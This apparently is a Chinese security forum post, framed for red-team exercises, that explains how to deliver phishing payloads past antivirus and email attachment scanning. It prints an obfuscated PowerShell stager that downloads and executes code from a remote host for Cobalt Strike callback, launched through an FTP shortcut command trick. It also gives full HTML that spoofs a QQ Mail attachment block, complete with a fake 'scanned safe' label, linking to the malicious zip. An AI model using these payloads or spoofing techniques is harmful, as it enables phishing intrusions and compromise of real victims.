【HVV2022】邮件钓鱼bypass附件检测&&杀软一把梭

某护也快开始了,希望能够提供一些借鉴意义

0x01 前言

先申明利益相关方,本文章仅为思路分享,品牌关键处会打码处理,不过确实挺有意思的,某护也快开始了,希望能够提供一些借鉴意义。

0x02 ByPass AV

将恶意文件,上传到github项目

https://github.com/punch0day/cs_test

图片

有经验的师傅,一眼就可以看出,这是Link钓鱼

但是某压缩包是检测为安全的

图片

图片

VirusTotal全球57家厂商,只有1家能够检测出来,过国内所有杀软不在话下,篇幅原因,powershell混淆技巧不细讲,师傅们可以先关注我,留作下次分享

源码如下:

aaa.dll
#ftp快捷方式运行时,会加载此dll
!cmd /c po^we^rs^he^ll -ex^ec b^yp^ass .\\bbb.ps1
bbb.ps1
#cs上线
powershell.exe -nOp -w hIdDEn -c $ExeCuTiOnCoNtExT.InvOkeCoMmAnD.NeWScriPtBlOcK("IE##X ((nE##w-ObJe##ct ('nE##T.wEB##cLiEnT')).('doWnl##OadStRiNg').inVo##KE('ht'+'tp:/'+'/19'+'2.16'+'8.20'+'6.1'+'32:8'+'0/a'))".Replace("##",""))

(ps:可过所有静态查杀,动态的查杀看情况,像360杀毒(非卫士),win defender可过,国内某些杀软一调用powershell进程就报可疑)

图片

快捷方式改为以上这样就行了,原理上是利用了ftp命令模式下,输入!会命令执行,这个是其他师傅的方法,非原创,但是bypass是自己做的

图片

只要一打开快捷键,立马cs上线

图片

参考文献:
【2022HVV系列】|9\-红蓝对抗之钓鱼篇:常见钓鱼思路总结
https://www.77169.net/html/291698.html
PowerShell攻击的混淆方法总结
http://www.mchz.com.cn/cn/service/Safety-Lab/info_26_itemid_3320.html

0x03 ByPass 邮箱附件检测

上传到github上后,选择将code下载为zip格式,下载到本地后,找到游览器的历史下载记录,并复制下载链接

https://codeload.github.com/punch0day/cs_test/zip/refs/heads/main

打开某邮箱,找到一个带有附件的邮件

图片

复制附件的html代码

图片

发送邮件,进行测试,选择“格式”插入html,粘贴html代码

图片

找到“下载”的<a>标签 进行修改 改为<a href=”刚才github的下载链接”>

整个payload如下:

<div id="qm_con_body"><div id="mailContentContainer" class="qmbox qm_con_body_content qqmail_webmail_onlystyle="opacity: 1;"><div id="attachmenta="" b="falsestyle="padding:2px;" class="attbgui-type="attCon"><div style="padding:6px 10px 10px 8px;" class="txt_left"><div style="height:14px;">            <b style="font-size:14px;"><img src="https://rescdn.qqmail.com/zh_CN/htmledition/images/spacer1e9c5d.gifalign="absmiddleclass="ico_att showattchborder="0" style="margin:-3px 2px 0 0;">附件</b>(<span id="attachmentCount">1</span> 个)</div></div><div style="padding:0 8px 6px 12px;background:#fff;_height:60px;line-height:140%;"><div class="graytext clearstyle="padding-top:12pxpadding-bottom:5px"><span style="color:#000;font-weight:bold;font-size:12px;">普通附件</span>                <span id="span_ZL0012_1yrN1r~M_twu3KkAAIjVLc5_safe"> (<span class="ico_Avira"></span>已通过电脑管家云查杀引擎扫描)</span>                        </div><div class="att_bt attachitem"><div class="ico_big"><a id="AttachIconAZL0012_1yrN1r~M_twu3KkAAIjVLc50attach="1" attid="请重点关注.docxviewmode="docurl="/cgi-bin/viewdocument?sid=lGnwl-6PmrgMcwZk&amp;filename=1.docx&amp;mailid=1&amp;retry=true&amp;t=attachments_content&amp;ef=qfunc&amp;s=yozo&amp;fromattach=1" ck="previewAttach2idx="0" filename="请重点关注.docxdown="/cgi-bin/download?mailid=1&amp;filename=1.dociconurl="/zh_CN/htmledition/images/xdisk/ico_mid/fu_doc.giffilebyte="15360" sparse2onlinedocurl=""><img style="width:auto;" src="/zh_CN/htmledition/images/xdisk/ico_mid/fu_doc.gif"></a></div><div class="name_big">            <span player="/cgi-bin/download?mailid=1&amp;filename=1.docx&amp;sid=1">请重点关注.docx</span><span class="graytext">&nbsp;(15K<span id="span_attachIndex_ZL0012_1yrN1r~M_twu3KkAAIjVLc5_cd690305b12fa8de1acdd0ee2fc76181style="display:none">, <span style="color: #C00;">附件包含病毒,请勿下载打开 </span></span>)</span><div class="down_big"><a ck="previewAttachselect="1" sparse2onlinedocurl="" down="/cgi-bin/download?mailid=1&amp;filename=1.docx&amp;sid=1">预览</a>&nbsp; <a href="https://codeload.github.com/punch0day/cs_test/zip/refs/heads/main">下载</a>&nbsp;&nbsp; <a style="" flag="0" class="needSetFlagattachkey="1|1.docx|1.docx|15360"><span>收藏</span></a><span style="display:none;" class="graytext"><span>已收藏, </span><a>查看</a></span>&nbsp;&nbsp; <a ui-type="netdiskBindattid="1|1|1" class="netdisk_hide"><span>转存</span><span class="bind_down_icon"></span></a></div></div></div></div></div></div></div>

图片

亲测可行,不管是企业邮箱,个人邮箱,桌面端,移动端,全部都是本地直接下载,附件不会经过邮箱的任何安全检测,直接bypass!

  • 发表于 2022-07-01 09:42:56
  • 阅读 ( 9589 )
  • 分类:漏洞分析

3 条评论

pokeroot
ps:可以过静态(360杀毒),动态(安全卫士)和沙箱不行,只是给大家提供一些思路,个人公众号:韬光养晦安全。
请先 登录 后评论
用户不存在(已注销)
dlddw
请先 登录 后评论
狗哥
学习了
请先 登录 后评论
请先 登录 后评论
pokeroot
pokeroot

6 篇文章

站长统计